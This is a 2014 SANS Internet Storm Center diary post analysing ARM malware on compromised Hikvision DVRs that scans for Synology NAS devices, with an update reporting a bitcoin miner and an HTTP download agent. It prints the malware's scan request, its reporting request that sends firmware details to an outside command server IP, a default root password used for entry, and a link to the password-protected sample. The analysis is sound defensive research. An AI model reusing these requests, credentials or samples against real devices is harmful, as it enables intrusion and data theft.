Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: InfoSec Handlers Diary Blog - More Device Malware: This is why your DVR attacked my Synology Disk Station (and now with Bitcoin Miner!) InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

More Device Malware: This is why your DVR attacked my Synology Disk Station (and now with Bitcoin Miner!)

Published: 2014-03-31
Last Updated: 2014-03-31 17:29:48 UTC
by Johannes Ullrich (Version: 1)
6 comment(s)

Update: Just found what looks like a bitcoin miner on the infected DVR. There are two more binaries. D72BNr, the bitcoin miner (according to the usage info based on strings) and mzkk8g, which looksl ike a simplar http agent, maybe to download additional tools easily (similar to curl/wget which isn't installed on this DVR by default). I will add these two files to https://isc.sans.edu/diaryimages/hikvision.zip shortly.

Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ).

Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) .

The malware resides in /dev/cmd.so . A number of additional suspect files where located in the /dev directory which we still need to recover / analyze from the test system. The compromisse of the DVR likely happened via an exposed telnet port and a default root password (12345). 

Analysis of the malware is still ongoing, and any help is appreciated (see link to malware above). Here are some initial findings:

- The malware is an ARM binary, indicating that it is targeting devices, not your typical x86 Linux server.
- The malware scans for Synology devices exposed on port 5000. The http request sent by the malware:

GET /webman/info.cgi?host= HTTP/1.0
Host: [IP Address of the Target]:5000
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
- it then extracts the firmware version details and transmits them to 162.219.57.8. The request used for this reporting channel:
 
GET /k.php?h=%lu HTTP/1.0
Host: 162.219.57.8
User-Agent: Ballsack
Connection: close
 
So in short, this malware is just scanning for vulnerable devices, and the actual exploit will likely come later.
 
[1] http://www.hikvision.com/en/us/Products_show.asp?id=4258

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Keywords: dvr synology
6 comment(s)
Diary Archives